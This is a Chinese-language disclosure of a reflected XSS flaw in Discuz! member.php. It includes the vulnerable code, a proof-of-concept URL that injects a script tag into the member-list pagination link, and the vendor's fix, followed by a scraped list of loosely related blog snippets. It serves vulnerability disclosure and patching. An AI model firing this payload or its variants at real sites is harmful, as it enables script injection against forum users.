Discuz! member.php xss bug
author: 80vul-B
team:[url]http://www.80vul.com[/url]
一 分析
member.php代码:
if(!empty($listgid) && ($listgid == intval($_GET['listgid']))) {
//这里用的等于[==]而不是全等[===]进行的比较,且$listgid并没有初始化:)
$type = $adminid == 1 ? 'grouplist' : $type;
} else {
$listgid = '';
}
...
$multipage = multi($num, $memberperpage, $page, "member.php?action=list&listgid=$listgid&srchmem=".rawurlencode($srchmem)."&order=$order&type=$type", $membermaxpages);
二 利用
poc:
poc:
[url]http://www.80vul.com/bbs/member.php?action=list&listgid=%22%3E%3Cscript%3Ealert[/url](/xss/)%3C/script%3E
会员列表页面存在分页时触发
三 补丁[fix]
刚发布的dz7 bt版本[1]已经fix这个漏洞了:
if(!empty($listgid) && ($listgid = intval($_GET['listgid']))) {
$type = $adminid == 1 ? 'grouplist' : $type;
} else {
$listgid = '';
}
[1]:[url]http://download.comsenz.com/Discuz/7.0.0Beta/Discuz_7_Beta_SC_GBK.zip[/url]
Discuz! member.php xss bug相关推荐
- Discuz member模块功能解析
知识点 1.ip转换成地址 discuzip装换成地址用的是离线数据,一个叫纯真IP地址数据库的数据库,存放了几乎所有ip到地址的映射,且经常有更新,可以在这个git库上下载,也可以网上搜qqwry. ...
- Discuz学习总结——部分bug解决方案
2019独角兽企业重金招聘Python工程师标准>>> 一开始安装discuz的时候,总会遇到一些问题,这里列举几个自己目前遇到的问题,进行排解 1.论坛首页css样式丢失 很多人一 ...
- $_server['php_self'] 漏洞,Discuz! $_SERVER['PHP_SELF'] XSS Vulnerability
在common.inc.php文件的69行: $PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NA ...
- discuz member.php,Discuz启用Memberchach完美教程
大致我们需要三步 1.在网站后台开启Memberchach并配置参数 2.修改网站配置文件config_global.php 3.配置Php环境使它支持Memberchach 下面我们开始动手 首先进 ...
- 反射型XSS漏洞详解
反射型XSS漏洞 如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞.通常,该页面会使用一个包含消息文本的参数,并在响应中将这个文 本返回给用户.对于开发者而言,使用这种机制 ...
- 《XSS跨站脚本攻击剖析与防御》—第6章6.1节参 考 文 献
本节书摘来自异步社区<XSS跨站脚本攻击剖析与防御>一书中的第6章6.1节参 考 文 献,作者邱永华,更多章节内容可以访问云栖社区"异步社区"公众号查看. 参 考 文 ...
- xxs漏洞危害_反射型XSS漏洞详解
反射型XSS漏洞 如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞.通常,该页面会使用一个包含消息文本的参数,并在响应中将这个文 本返回给用户.对于开发者而言,使用这种机制 ...
- [PHP] 2018年终总结
去掉敏感信息后的不完整版 ========================================================================== 2018年12月29日 ...
- PHP magic_quotes_gpc
大多的PHP程序,都有这样的逻辑: 如果发现php.ini配置为不给GPC变量自动添加转义斜线,则PHP自动为GPC添加转义斜线 但是事实上,这是错误的,因为它改变了GPC变量原来的值. 有这个遗留习 ...
最新文章
- Twisted入门教程(3)
- MySQL—05—MySQL如何处理SQL语句;MySQL数据库存储引擎介绍;
- java超时导致oracle锁表_java – 正确的设计,以避免Oracle死锁?
- hibernate保存失败_Hibernate:保存与保存并保存或更新
- 【C语言进阶深度学习记录】二十九 main函数与命令行参数
- TensorFlow2.1正式版发布!最后一次支持Python2,进一步支持TPU
- 谈判失败:Oracle杀死Java EE
- 博弈论初步(SG函数)
- Atitit . 编程模型的变革总结
- 一元多项式的乘法与加法运算_如果加法变成【乘法】 , 那么什么能变成【加法】 ? ——记一则函数方程...
- 视频教程-通俗易懂的RPC框架Dubbo视频教程-Java
- 《统计自然语言处理》(宗成庆)学习笔记(一)
- php数据库 datetime转化时间错,分析php日期转时间戳
- 2021前端开发面试题:面试中该如何与HR谈薪资?
- 七脉轮位置_[转载]地球的七大脉轮位置
- 带K线的macd选股指标详解 优化MACD王牌指标 通达信macd选股指标源码
- 视频抽帧为图片和一系列图片转换为视频
- C++八股文分享---数据结构其二---哈希表
- 牛客 最小互质数(筛法求解)
- openfire html5,HTML5来了,7个混合式移动开发框架
热门文章
- android 顺序执行任务
- Standalone WSGI Containers
- 从零开始_学_数据结构(六)——排序(冒泡、插入、希尔、简单选择、归并、快速)...
- 简述RHEL7新特性(一)
- 使用Response.Redirect 两种方法打开一个新窗口
- 在oracle中怎么判断一个日期是否在一定时间范围内
- Repeater控件的使用
- 『Tarjan算法 无向图的双联通分量』
- Android 中文 API (90) —— WindowManager
- IntelliJ IDEA 环境常用设置整理